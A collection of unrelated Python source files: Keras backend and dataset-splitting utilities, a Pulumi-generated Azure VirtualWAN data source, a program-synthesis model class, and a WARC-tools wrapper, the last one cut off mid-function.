(batch_size,) + output_shape + (channels_out,)
if data_format='channels_last'.
Raises:
ValueError: if `data_format` is neither
`channels_last` nor `channels_first`.
"""
if data_format is None:
data_format = image_data_format()
if data_format not in {'channels_first', 'channels_last'}:
raise ValueError('Unknown data_format: ' + str(data_format))
kernel_shape = int_shape(kernel)
feature_dim = kernel_shape[1]
channels_out = kernel_shape[-1]
ndims = len(output_shape)
spatial_dimensions = list(range(ndims))
xs = []
output_axes_ticks = [range(axis_max) for axis_max in output_shape]
for position in itertools.product(*output_axes_ticks):
slices = [slice(None)]
if data_format == 'channels_first':
slices.append(slice(None))
slices.extend([slice(position[d] * strides[d],
position[d] * strides[d] + kernel_size[d])
for d in spatial_dimensions])
if data_format == 'channels_last':
slices.append(slice(None))
xs.append(reshape(inputs[slices], (1, -1, feature_dim)))
x_aggregate = concatenate(xs, axis=0)
output = batch_dot(x_aggregate, kernel)
output = reshape(output, output_shape + (-1, channels_out))
if data_format == 'channels_first':
permutation = [ndims, ndims + 1] + spatial_dimensions
else:
permutation = [ndims] + spatial_dimensions + [ndims + 1]
return permute_dimensions(output, permutation)
@keras_export('keras.backend.local_conv1d')
def local_conv1d(inputs, kernel, kernel_size, strides, data_format=None):
"""Apply 1D conv with un-shared weights.
Arguments:
inputs: 3D tensor with shape:
(batch_size, steps, input_dim)
if data_format is "channels_last" or
(batch_size, input_dim, steps)
if data_format is "channels_first".
kernel: the unshared weight for convolution,
with shape (output_length, feature_dim, filters).
kernel_size: a tuple of a single integer,
specifying the length of the 1D convolution window.
strides: a tuple of a single integer,
specifying the stride length of the convolution.
data_format: the data format, channels_first or channels_last.
Returns:
A 3d tensor with shape:
(batch_size, output_length, filters)
if data_format='channels_first'
or 3D tensor with shape:
(batch_size, filters, output_length)
if data_format='channels_last'.
"""
output_shape = (kernel.shape[0],)
return local_conv(inputs,
kernel,
kernel_size,
strides,
output_shape,
data_format)
@keras_export('keras.backend.local_conv2d')
def local_conv2d(inputs,
kernel,
kernel_size,
strides,
output_shape,
data_format=None):
"""Apply 2D conv with un-shared weights.
Arguments:
inputs: 4D tensor with shape:
(batch_size, filters, new_rows, new_cols)
if data_format='channels_first'
or 4D tensor with shape:
(batch_size, new_rows, new_cols, filters)
if data_format='channels_last'.
kernel: the unshared weight for convolution,
with shape (output_items, feature_dim, filters).
kernel_size: a tuple of 2 integers, specifying the
width and height of the 2D convolution window.
strides: a tuple of 2 integers, specifying the strides
of the convolution along the width and height.
output_shape: a tuple with (output_row, output_col).
data_format: the data format, channels_first or channels_last.
Returns:
A 4D tensor with shape:
(batch_size, filters, new_rows, new_cols)
if data_format='channels_first'
or 4D tensor with shape:
(batch_size, new_rows, new_cols, filters)
if data_format='channels_last'.
"""
return local_conv(inputs,
kernel,
kernel_size,
strides,
output_shape,
data_format)
@keras_export('keras.backend.bias_add')
def bias_add(x, bias, data_format=None):
"""Adds a bias vector to a tensor.
Arguments:
x: Tensor or variable.
bias: Bias tensor to add.
data_format: string, `"channels_last"` or `"channels_first"`.
Returns:
Output tensor.
Raises:
ValueError: In one of the two cases below:
1. invalid `data_format` argument.
2. invalid bias shape.
the bias should be either a vector or
a tensor with ndim(x) - 1 dimension
"""
if data_format is None:
data_format = image_data_format()
if data_format not in {'channels_first', 'channels_last'}:
raise ValueError('Unknown data_format: ' + str(data_format))
bias_shape = int_shape(bias)
if len(bias_shape) != 1 and len(bias_shape) != ndim(x) - 1:
raise ValueError(
'Unexpected bias dimensions %d, expect to be 1 or %d dimensions' %
(len(bias_shape), ndim(x)))
# pylint: disable=g-no-augmented-assignment
if ndim(x) == 5:
if data_format == 'channels_first':
if len(bias_shape) == 1:
x = x + reshape(bias, (1, bias_shape[0], 1, 1, 1))
else:
x = x + reshape(bias, (1, bias_shape[3]) + bias_shape[:3])
elif data_format == 'channels_last':
if len(bias_shape) == 1:
x = x + reshape(bias, (1, 1, 1, bias_shape[0]))
else:
x = x + reshape(bias, (1,) + bias_shape)
elif ndim(x) == 4:
if data_format == 'channels_first':
if len(bias_shape) == 1:
if _has_nchw_support():
x = nn.bias_add(x, bias, data_format='NCHW')
else:
x = x + reshape(bias, (1, bias_shape[0], 1, 1))
else:
x = x + reshape(bias, (1, bias_shape[2]) + bias_shape[:2])
elif data_format == 'channels_last':
if len(bias_shape) == 1:
x = nn.bias_add(x, bias, data_format='NHWC')
else:
x = x + reshape(bias, (1,) + bias_shape)
elif ndim(x) == 3:
if data_format == 'channels_first':
if len(bias_shape) == 1:
x = x + reshape(bias, (1, bias_shape[0], 1))
else:
x = x + reshape(bias, (1, bias_shape[1], bias_shape[0]))
elif data_format == 'channels_last':
if len(bias_shape) == 1:
x = x + reshape(bias, (1, 1, bias_shape[0]))
else:
x = x + reshape(bias, (1,) + bias_shape)
else:
x = nn.bias_add(x, bias)
# pylint: enable=g-no-augmented-assignment
return x
# RANDOMNESS
@keras_export('keras.backend.random_normal')
def random_normal(shape, mean=0.0, stddev=1.0, dtype=None, seed=None):
"""Returns a tensor with normal distribution of values.
Arguments:
shape: A tuple of integers, the shape of tensor to create.
mean: A float, mean of the normal distribution to draw samples.
stddev: A float, standard deviation of the normal distribution
to draw samples.
dtype: String, dtype of returned tensor.
seed: Integer, random seed.
Returns:
A tensor.
"""
if dtype is None:
dtype = floatx()
if seed is None:
seed = np.random.randint(10e6)
return random_ops.random_normal(
shape, mean=mean, stddev=stddev, dtype=dtype, seed=seed)
@keras_export('keras.backend.random_uniform')
def random_uniform(shape, minval=0.0, maxval=1.0, dtype=None, seed=None):
"""Returns a tensor with uniform distribution of values.
Arguments:
shape: A tuple of integers, the shape of tensor to create.
minval: A float, lower boundary of the uniform distribution
to draw samples.
maxval: A float, upper boundary of the uniform distribution
to draw samples.
dtype: String, dtype of returned tensor.
seed: Integer, random seed.
Returns:
A tensor.
"""
if dtype is None:
dtype = floatx()
if seed is None:
seed = np.random.randint(10e6)
return random_ops.random_uniform(
shape, minval=minval, maxval=maxval, dtype=dtype, seed=seed)
@keras_export('keras.backend.random_binomial')
def random_binomial(shape, p=0.0, dtype=None, seed=None):
"""Returns a tensor with random binomial distribution of values.
Arguments:
shape: A tuple of integers, the shape of tensor to create.
p: A float, `0. <= p <= 1`, probability of binomial distribution.
dtype: String, dtype of returned tensor.
seed: Integer, random seed.
Returns:
A tensor.
"""
if dtype is None:
dtype = floatx()
if seed is None:
seed = np.random.randint(10e6)
return array_ops.where(
random_ops.random_uniform(shape, dtype=dtype, seed=seed) <= p,
array_ops.ones(shape, dtype=dtype), array_ops.zeros(shape, dtype=dtype))
@keras_export('keras.backend.truncated_normal')
def truncated_normal(shape, mean=0.0, stddev=1.0, dtype=None, seed=None):
"""Returns a tensor with truncated random normal distribution of values.
The generated values follow a normal distribution
with specified mean and standard deviation,
except that values whose magnitude is more than
two standard deviations from the mean are dropped and re-picked.
Arguments:
shape: A tuple of integers, the shape of tensor to create.
mean: Mean of the values.
stddev: Standard deviation of the values.
dtype: String, dtype of returned tensor.
seed: Integer, random seed.
Returns:
A tensor.
"""
if dtype is None:
dtype = floatx()
if seed is None:
seed = np.random.randint(10e6)
return random_ops.truncated_normal(
shape, mean, stddev, dtype=dtype, seed=seed)
# CTC
# TensorFlow has a native implementation, but it uses sparse tensors
# and therefore requires a wrapper for Keras. The functions below convert
# dense to sparse tensors and also wraps up the beam search code that is
# in TensorFlow's CTC implementation
@keras_export('keras.backend.ctc_label_dense_to_sparse')
def ctc_label_dense_to_sparse(labels, label_lengths):
"""Converts CTC labels from dense to sparse.
Arguments:
labels: dense CTC labels.
label_lengths: length of the labels.
Returns:
A sparse tensor representation of the labels.
"""
label_shape = array_ops.shape(labels)
num_batches_tns = array_ops.stack([label_shape[0]])
max_num_labels_tns = array_ops.stack([label_shape[1]])
def range_less_than(_, current_input):
return array_ops.expand_dims(
math_ops.range(label_shape[1]), 0) < array_ops.fill(
max_num_labels_tns, current_input)
init = math_ops.cast(
array_ops.fill([1, label_shape[1]], 0), dtypes_module.bool)
dense_mask = functional_ops.scan(
range_less_than, label_lengths, initializer=init, parallel_iterations=1)
dense_mask = dense_mask[:, 0, :]
label_array = array_ops.reshape(
array_ops.tile(math_ops.range(0, label_shape[1]), num_batches_tns),
label_shape)
label_ind = array_ops.boolean_mask(label_array, dense_mask)
batch_array = array_ops.transpose(
array_ops.reshape(
array_ops.tile(math_ops.range(0, label_shape[0]), max_num_labels_tns),
reverse(label_shape, 0)))
batch_ind = array_ops.boolean_mask(batch_array, dense_mask)
indices = array_ops.transpose(
array_ops.reshape(concatenate([batch_ind, label_ind], axis=0), [2, -1]))
vals_sparse = array_ops.gather_nd(labels, indices)
return sparse_tensor.SparseTensor(
math_ops.cast(indices, dtypes_module.int64), vals_sparse,
math_ops.cast(label_shape, dtypes_module.int64))
@keras_export('keras.backend.ctc_batch_cost')
def ctc_batch_cost(y_true, y_pred, input_length, label_length):
"""Runs CTC loss algorithm on each batch element.
Arguments:
y_true: tensor `(samples, max_string_length)`
containing the truth labels.
y_pred: tensor `(samples, time_steps, num_categories)`
containing the prediction, or output of the softmax.
input_length: tensor `(samples, 1)` containing the sequence length for
each batch item in `y_pred`.
label_length: tensor `(samples, 1)` containing the sequence length for
each batch item in `y_true`.
Returns:
Tensor with shape (samples,1) containing the
CTC loss of each element.
"""
label_length = math_ops.cast(
array_ops.squeeze(label_length, axis=-1), dtypes_module.int32)
input_length = math_ops.cast(
array_ops.squeeze(input_length, axis=-1), dtypes_module.int32)
sparse_labels = math_ops.cast(
ctc_label_dense_to_sparse(y_true, label_length), dtypes_module.int32)
y_pred = math_ops.log(array_ops.transpose(y_pred, perm=[1, 0, 2]) + epsilon())
return array_ops.expand_dims(
ctc.ctc_loss(
inputs=y_pred, labels=sparse_labels, sequence_length=input_length), 1)
@keras_export('keras.backend.ctc_decode')
def ctc_decode(y_pred, input_length, greedy=True, beam_width=100, top_paths=1):
"""Decodes the output of a softmax.
Can use either greedy search (also known as best path)
or a constrained dictionary search.
Arguments:
y_pred: tensor `(samples, time_steps, num_categories)`
containing the prediction, or output of the softmax.
input_length: tensor `(samples, )` containing the sequence length for
each batch item in `y_pred`.
greedy: perform much faster best-path search if `true`.
This does not use a dictionary.
beam_width: if `greedy` is `false`: a beam search decoder will be used
with a beam of this width.
top_paths: if `greedy` is `false`,
how many of the most probable paths will be returned.
Returns:
Tuple:
List: if `greedy` is `true`, returns a list of one element that
contains the decoded sequence.
If `false`, returns the `top_paths` most probable
decoded sequences.
Important: blank labels are returned as `-1`.
Tensor `(top_paths, )` that contains
the log probability of each decoded sequence.
"""
y_pred = math_ops.log(array_ops.transpose(y_pred, perm=[1, 0, 2]) + epsilon())
input_length = math_ops.cast(input_length, dtypes_module.int32)
if greedy:
(decoded, log_prob) = ctc.ctc_greedy_decoder(
inputs=y_pred, sequence_length=input_length)
else:
(decoded, log_prob) = ctc.ctc_beam_search_decoder(
inputs=y_pred,
sequence_length=input_length,
beam_width=beam_width,
top_paths=top_paths)
decoded_dense = [
sparse_ops.sparse_to_dense(
st.indices, st.dense_shape, st.values, default_value=-1)
for st in decoded
]
return (decoded_dense, log_prob)
# HIGH ORDER FUNCTIONS
@keras_export('keras.backend.map_fn')
def map_fn(fn, elems, name=None, dtype=None):
"""Map the function fn over the elements elems and return the outputs.
Arguments:
fn: Callable that will be called upon each element in elems
elems: tensor
name: A string name for the map node in the graph
dtype: Output data type.
Returns:
Tensor with dtype `dtype`.
"""
return map_fn_lib.map_fn(fn, elems, name=name, dtype=dtype)
@keras_export('keras.backend.foldl')
def foldl(fn, elems, initializer=None, name=None):
"""Reduce elems using fn to combine them from left to right.
Arguments:
fn: Callable that will be called upon each element in elems and an
accumulator, for instance `lambda acc, x: acc + x`
elems: tensor
initializer: The first value used (`elems[0]` in case of None)
name: A string name for the foldl node in the graph
Returns:
Tensor with same type and shape as `initializer`.
"""
return functional_ops.foldl(fn, elems, initializer=initializer, name=name)
@keras_export('keras.backend.foldr')
def foldr(fn, elems, initializer=None, name=None):
"""Reduce elems using fn to combine them from right to left.
Arguments:
fn: Callable that will be called upon each element in elems and an
accumulator, for instance `lambda acc, x: acc + x`
elems: tensor
initializer: The first value used (`elems[-1]` in case of None)
name: A string name for the foldr node in the graph
Returns:
Same type and shape as initializer
"""
return functional_ops.foldr(fn, elems, initializer=initializer, name=name)
# Load Keras default configuration from config file if present.
# Set Keras base dir path given KERAS_HOME env variable, if applicable.
# Otherwise either ~/.keras or /tmp.
if 'KERAS_HOME' in os.environ:
_keras_dir = os.environ.get('KERAS_HOME')
else:
_keras_base_dir = os.path.expanduser('~')
_keras_dir = os.path.join(_keras_base_dir, '.keras')
_config_path = os.path.expanduser(os.path.join(_keras_dir, 'keras.json'))
if os.path.exists(_config_path):
try:
_config = json.load(open(_config_path))
except ValueError:
_config = {}
_floatx = _config.get('floatx', floatx())
assert _floatx in {'float16', 'float32', 'float64'}
_epsilon = _config.get('epsilon', epsilon())
assert isinstance(_epsilon, float)
_image_data_format = _config.get('image_data_format', image_data_format())
assert _image_data_format in {'channels_last', 'channels_first'}
set_floatx(_floatx)
set_epsilon(_epsilon)
set_image_data_format(_image_data_format)
# Save config file.
if not os.path.exists(_keras_dir):
try:
os.makedirs(_keras_dir)
except OSError:
# Except permission denied and potential race conditions
# in multi-threaded environments.
pass
if not os.path.exists(_config_path):
_config = {
'floatx': floatx(),
'epsilon': epsilon(),
'backend': 'tensorflow',
'image_data_format': image_data_format()
}
try:
with open(_config_path, 'w') as f:
f.write(json.dumps(_config, indent=4))
except IOError:
# Except permission denied.
pass
def in_multi_worker_mode():
"""Whether we are operating in a Multi-Worker setting."""
tf_config = json.loads(os.environ.get('TF_CONFIG', '{}'))
cluster_spec = server_lib.ClusterSpec(tf_config.get('cluster', {}))
return tf_config and 'master' not in cluster_spec.jobs
def configure_and_create_distributed_session(distribution_strategy):
"""Configure session config and create a session with it."""
def _create_session(distribution_strategy):
"""Create the Distributed Strategy session."""
session_config = get_default_session_config()
# If a session already exists, merge in its config; in the case there is a
# conflict, take values of the existing config.
global _SESSION
if getattr(_SESSION, 'session', None) and _SESSION.session._config:
session_config.MergeFrom(_SESSION.session._config)
if is_tpu_strategy(distribution_strategy):
# TODO(priyag, yuefengz): Remove this workaround when Distribute
# Coordinator is integrated with keras and we can create a session from
# there.
distribution_strategy.configure(session_config)
master = distribution_strategy.extended._tpu_cluster_resolver.master() # pylint: disable=protected-access
session = session_module.Session(config=session_config, target=master)
else:
worker_context = dc_context.get_current_worker_context()
if worker_context:
dc_session_config = worker_context.session_config
# Merge the default session config to the one from distribute
# coordinator, which is fine for now since they don't have
# conflicting configurations.
dc_session_config.MergeFrom(session_config)
session = session_module.Session(
config=dc_session_config, target=worker_context.master_target)
else:
distribution_strategy.configure(session_config)
session = session_module.Session(config=session_config)
set_session(session)
if in_multi_worker_mode():
dc.run_distribute_coordinator(
_create_session,
distribution_strategy,
mode=dc.CoordinatorMode.INDEPENDENT_WORKER)
else:
_create_session(distribution_strategy)
def is_tpu_strategy(strategy):
"""We're executing TPU Strategy."""
return strategy is not None and strategy.__class__.__name__ == 'TPUStrategy'
def cast_variables_to_tensor(tensors):
def _cast_variables_to_tensor(tensor):
if isinstance(tensor, variables_module.Variable):
return array_ops.identity(tensor)
return tensor
return nest.map_structure(_cast_variables_to_tensor, tensors)
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
__all__ = [
'GetVirtualWanResult',
'AwaitableGetVirtualWanResult',
'get_virtual_wan',
]
@pulumi.output_type
class GetVirtualWanResult:
"""
VirtualWAN Resource.
"""
def __init__(__self__, allow_branch_to_branch_traffic=None, allow_vnet_to_vnet_traffic=None, disable_vpn_encryption=None, etag=None, location=None, name=None, office365_local_breakout_category=None, p2_s_vpn_server_configurations=None, provisioning_state=None, security_provider_name=None, tags=None, type=None, virtual_hubs=None, vpn_sites=None):
if allow_branch_to_branch_traffic and not isinstance(allow_branch_to_branch_traffic, bool):
raise TypeError("Expected argument 'allow_branch_to_branch_traffic' to be a bool")
pulumi.set(__self__, "allow_branch_to_branch_traffic", allow_branch_to_branch_traffic)
if allow_vnet_to_vnet_traffic and not isinstance(allow_vnet_to_vnet_traffic, bool):
raise TypeError("Expected argument 'allow_vnet_to_vnet_traffic' to be a bool")
pulumi.set(__self__, "allow_vnet_to_vnet_traffic", allow_vnet_to_vnet_traffic)
if disable_vpn_encryption and not isinstance(disable_vpn_encryption, bool):
raise TypeError("Expected argument 'disable_vpn_encryption' to be a bool")
pulumi.set(__self__, "disable_vpn_encryption", disable_vpn_encryption)
if etag and not isinstance(etag, str):
raise TypeError("Expected argument 'etag' to be a str")
pulumi.set(__self__, "etag", etag)
if location and not isinstance(location, str):
raise TypeError("Expected argument 'location' to be a str")
pulumi.set(__self__, "location", location)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if office365_local_breakout_category and not isinstance(office365_local_breakout_category, str):
raise TypeError("Expected argument 'office365_local_breakout_category' to be a str")
pulumi.set(__self__, "office365_local_breakout_category", office365_local_breakout_category)
if p2_s_vpn_server_configurations and not isinstance(p2_s_vpn_server_configurations, list):
raise TypeError("Expected argument 'p2_s_vpn_server_configurations' to be a list")
pulumi.set(__self__, "p2_s_vpn_server_configurations", p2_s_vpn_server_configurations)
if provisioning_state and not isinstance(provisioning_state, str):
raise TypeError("Expected argument 'provisioning_state' to be a str")
pulumi.set(__self__, "provisioning_state", provisioning_state)
if security_provider_name and not isinstance(security_provider_name, str):
raise TypeError("Expected argument 'security_provider_name' to be a str")
pulumi.set(__self__, "security_provider_name", security_provider_name)
if tags and not isinstance(tags, dict):
raise TypeError("Expected argument 'tags' to be a dict")
pulumi.set(__self__, "tags", tags)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
if virtual_hubs and not isinstance(virtual_hubs, list):
raise TypeError("Expected argument 'virtual_hubs' to be a list")
pulumi.set(__self__, "virtual_hubs", virtual_hubs)
if vpn_sites and not isinstance(vpn_sites, list):
raise TypeError("Expected argument 'vpn_sites' to be a list")
pulumi.set(__self__, "vpn_sites", vpn_sites)
@property
@pulumi.getter(name="allowBranchToBranchTraffic")
def allow_branch_to_branch_traffic(self) -> Optional[bool]:
"""
True if branch to branch traffic is allowed.
"""
return pulumi.get(self, "allow_branch_to_branch_traffic")
@property
@pulumi.getter(name="allowVnetToVnetTraffic")
def allow_vnet_to_vnet_traffic(self) -> Optional[bool]:
"""
True if Vnet to Vnet traffic is allowed.
"""
return pulumi.get(self, "allow_vnet_to_vnet_traffic")
@property
@pulumi.getter(name="disableVpnEncryption")
def disable_vpn_encryption(self) -> Optional[bool]:
"""
Vpn encryption to be disabled or not.
"""
return pulumi.get(self, "disable_vpn_encryption")
@property
@pulumi.getter
def etag(self) -> str:
"""
Gets a unique read-only string that changes whenever the resource is updated.
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter
def location(self) -> str:
"""
Resource location.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> str:
"""
Resource name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="office365LocalBreakoutCategory")
def office365_local_breakout_category(self) -> str:
"""
The office local breakout category.
"""
return pulumi.get(self, "office365_local_breakout_category")
@property
@pulumi.getter(name="p2SVpnServerConfigurations")
def p2_s_vpn_server_configurations(self) -> Optional[Sequence['outputs.P2SVpnServerConfigurationResponse']]:
"""
list of all P2SVpnServerConfigurations associated with the virtual wan.
"""
return pulumi.get(self, "p2_s_vpn_server_configurations")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> str:
"""
The provisioning state of the resource.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="securityProviderName")
def security_provider_name(self) -> Optional[str]:
"""
The Security Provider name.
"""
return pulumi.get(self, "security_provider_name")
@property
@pulumi.getter
def tags(self) -> Optional[Mapping[str, str]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> str:
"""
Resource type.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="virtualHubs")
def virtual_hubs(self) -> Sequence['outputs.SubResourceResponse']:
"""
List of VirtualHubs in the VirtualWAN.
"""
return pulumi.get(self, "virtual_hubs")
@property
@pulumi.getter(name="vpnSites")
def vpn_sites(self) -> Sequence['outputs.SubResourceResponse']:
return pulumi.get(self, "vpn_sites")
class AwaitableGetVirtualWanResult(GetVirtualWanResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetVirtualWanResult(
allow_branch_to_branch_traffic=self.allow_branch_to_branch_traffic,
allow_vnet_to_vnet_traffic=self.allow_vnet_to_vnet_traffic,
disable_vpn_encryption=self.disable_vpn_encryption,
etag=self.etag,
location=self.location,
name=self.name,
office365_local_breakout_category=self.office365_local_breakout_category,
p2_s_vpn_server_configurations=self.p2_s_vpn_server_configurations,
provisioning_state=self.provisioning_state,
security_provider_name=self.security_provider_name,
tags=self.tags,
type=self.type,
virtual_hubs=self.virtual_hubs,
vpn_sites=self.vpn_sites)
def get_virtual_wan(resource_group_name: Optional[str] = None,
virtual_wan_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetVirtualWanResult:
"""
Use this data source to access information about an existing resource.
:param str resource_group_name: The resource group name of the VirtualWan.
:param str virtual_wan_name: The name of the VirtualWAN being retrieved.
"""
__args__ = dict()
__args__['resourceGroupName'] = resource_group_name
__args__['virtualWANName'] = virtual_wan_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-nextgen:network/v20181101:getVirtualWan', __args__, opts=opts, typ=GetVirtualWanResult).value
return AwaitableGetVirtualWanResult(
allow_branch_to_branch_traffic=__ret__.allow_branch_to_branch_traffic,
allow_vnet_to_vnet_traffic=__ret__.allow_vnet_to_vnet_traffic,
disable_vpn_encryption=__ret__.disable_vpn_encryption,
etag=__ret__.etag,
location=__ret__.location,
name=__ret__.name,
office365_local_breakout_category=__ret__.office365_local_breakout_category,
p2_s_vpn_server_configurations=__ret__.p2_s_vpn_server_configurations,
provisioning_state=__ret__.provisioning_state,
security_provider_name=__ret__.security_provider_name,
tags=__ret__.tags,
type=__ret__.type,
virtual_hubs=__ret__.virtual_hubs,
vpn_sites=__ret__.vpn_sites)
|
from __future__ import absolute_import
import os
import sys
import collections
import torch
from torch.autograd import Variable
import torch.nn as nn
from torch import optim
import torch.nn.functional as F
from program_synthesis.algolisp.dataset import data
from program_synthesis.algolisp.models import prepare_spec
from program_synthesis.algolisp.models.base import BaseCodeModel, InferenceResult, MaskedMemory, get_attn_mask
class Seq2CodeModel(BaseCodeModel):
def encode_text(self, stoi, batch):
inputs = prepare_spec.encode_schema_text(
stoi, batch, self.args.cuda)
hidden, memory = self.model.encode_text(inputs)
memory, seq_lengths, hidden = memory.pad(batch_first=True,
others_to_unsort=[hidden])
return hidden, memory, seq_lengths
def encode_io(self, stoi, batch):
input_keys, inputs, arg_nums, outputs = prepare_spec.encode_io(
stoi, batch, self.args.cuda)
task_enc = self.model.encode_io(input_keys, inputs, arg_nums, outputs)
return task_enc, task_enc.unsqueeze(1)
def encode_code(self, stoi, batch):
batch_ids, (code_seqs, unsort_idx) = prepare_spec.encode_candidate_code_seq(
stoi, batch, self.args.cuda)
code_info = None
if code_seqs:
hidden, memory = self.model.encode_code(code_seqs)
memory, seq_lengths, hidden = memory.pad(batch_first=True,
others_to_unsort=[hidden])
code_info = (hidden, memory, seq_lengths)
return self.model.extend_tensors(code_info, len(batch), batch_ids)
def encode(self, vocab, batch):
text_task_enc, text_memory, text_lengths = None, None, None
io_task_enc = None
code_enc, code_memory, code_lengths = None, None, None
if self.args.read_text:
text_task_enc, text_memory, text_lengths = self.encode_text(
vocab.wordtoi, batch)
if self.args.read_io:
io_task_enc, _ = self.encode_io(vocab.codetoi, batch)
hidden, memory, seq_lengths = self.model.encoder(
text_task_enc, text_memory, text_lengths, io_task_enc, code_enc,
code_memory, code_lengths)
attn_mask = get_attn_mask(seq_lengths, self.args.cuda) if seq_lengths else None
return hidden, MaskedMemory(memory, attn_mask)
|
# ------------------------------------------------------------------- #
# Copyright (c) 2007-2008 Hanzo Archives Limited. #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); #
# you may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or #
# implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
# #
# You may find more information about Hanzo Archives at #
# #
# http://www.hanzoarchives.com/ #
# #
# You may find more information about the WARC Tools project at #
# #
# http://code.google.com/p/warc-tools/ #
# ------------------------------------------------------------------- #
import warc
from wfile import WFile
from wrecord import WRecord
import sys
sys.path.insert (0, ".")
from wtypes import WTypes
#class WTypes:
#"A class to define Python WARC classes types"
#def __init__(self):
#self.WNone = 0
#self.WFile = 1
#self.WRecord = 2
#self.WBloc = 3
#self.AFile = 4
#self.ARecord = 5
class WBloc:
##Constructor ##
def __init__(self, wfile, wrec, httpheaders, alloc):
self.classtype = WTypes()
self.httpheaders = httpheaders
if (wfile.type != self.classtype.WFile or wrec.type != self.classtype.WRecord):
return 0
self.type = self.classtype.WBloc
self.me = warc.bless_WBloc(wfile.getInternal(self), wrec.getInternal(self), self.httpheaders, alloc)
## Bloc chunks recovering ##
def getNext0(self):
return warc.WBloc_next(self.me)
def getNext(self):
return warc.WRAPPER_WBloc_next(self.me)
def getHttpCode(self):
return warc.WBloc_getHttpCode(self.me)
def getLastChunkSize (self):
return warc.WBloc_getLastChunkSize(self.me)
## Python WBloc class particular methods
def type(self):
return self.type
## Destructor ##
def destroy(self):
warc.destroy(self.me)
## end ##
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Keras image dataset loading utilities."""
import multiprocessing
import os
import random
import time
import warnings
import numpy as np
import tensorflow.compat.v2 as tf
# isort: off
from tensorflow.python.util.tf_export import keras_export
@keras_export("keras.utils.split_dataset", v1=[])
def split_dataset(
dataset, left_size=None, right_size=None, shuffle=False, seed=None
):
"""Split a dataset into a left half and a right half (e.g. train / test).
Args:
dataset: A `tf.data.Dataset` object or a list/tuple of arrays with the
same length.
left_size: If float, it should be in range `[0, 1]` range and signifies
the fraction of the data to pack in the left dataset. If integer, it
signifies the number of samples to pack in the left dataset. If
`None`, it defaults to the complement to `right_size`.
right_size: If float, it should be in range `[0, 1]` range and signifies
the fraction of the data to pack in the right dataset. If integer, it
signifies the number of samples to pack in the right dataset. If
`None`, it defaults to the complement to `left_size`.
shuffle: Boolean, whether to shuffle the data before splitting it.
seed: A random seed for shuffling.
Returns:
A tuple of two `tf.data.Dataset` objects: the left and right splits.
"""
dataset_type_spec = _get_type_spec(dataset)
if dataset_type_spec not in [tf.data.Dataset, list, tuple, np.ndarray]:
raise TypeError(
"The `dataset` argument must be either a `tf.data.Dataset` "
"object or a list/tuple of arrays. "
f"Received: dataset={dataset} of type {type(dataset)}"
)
if right_size is None and left_size is None:
raise ValueError(
"At least one of the `left_size` or `right_size` "
"must be specified. Received: left_size=None and "
"right_size=None"
)
dataset_as_list = _convert_dataset_to_list(dataset, dataset_type_spec)
if shuffle:
if seed is None:
seed = random.randint(0, int(1e6))
random.seed(seed)
random.shuffle(dataset_as_list)
total_length = len(dataset_as_list)
left_size, right_size = _rescale_dataset_split_sizes(
left_size, right_size, total_length
)
left_split = list(dataset_as_list[:left_size])
right_split = list(dataset_as_list[-right_size:])
left_split = _restore_dataset_from_list(
left_split, dataset_type_spec, dataset
)
right_split = _restore_dataset_from_list(
right_split, dataset_type_spec, dataset
)
left_split = tf.data.Dataset.from_tensor_slices(left_split)
right_split = tf.data.Dataset.from_tensor_slices(right_split)
# apply batching to the splits if the dataset is batched
if dataset_type_spec is tf.data.Dataset and is_batched(dataset):
batch_size = get_batch_size(dataset)
if batch_size is not None:
left_split = left_split.batch(batch_size)
right_split = right_split.batch(batch_size)
left_split = left_split.prefetch(tf.data.AUTOTUNE)
right_split = right_split.prefetch(tf.data.AUTOTUNE)
return left_split, right_split
def _convert_dataset_to_list(
dataset,
dataset_type_spec,
data_size_warning_flag=True,
ensure_shape_similarity=True,
):
"""Convert `tf.data.Dataset` object or list/tuple of NumPy arrays to a list.
Args:
dataset : A `tf.data.Dataset` object or a list/tuple of arrays.
dataset_type_spec : the type of the dataset
data_size_warning_flag (bool, optional): If set to True, a warning will
be issued if the dataset takes longer than 10 seconds to iterate.
Defaults to True.
ensure_shape_similarity (bool, optional): If set to True, the shape of
the first sample will be used to validate the shape of rest of the
samples. Defaults to True.
Returns:
List: A list of tuples/NumPy arrays.
"""
dataset_iterator = _get_data_iterator_from_dataset(
dataset, dataset_type_spec
)
dataset_as_list = []
start_time = time.time()
for sample in _get_next_sample(
dataset_iterator,
ensure_shape_similarity,
data_size_warning_flag,
start_time,
):
if dataset_type_spec in [tuple, list]:
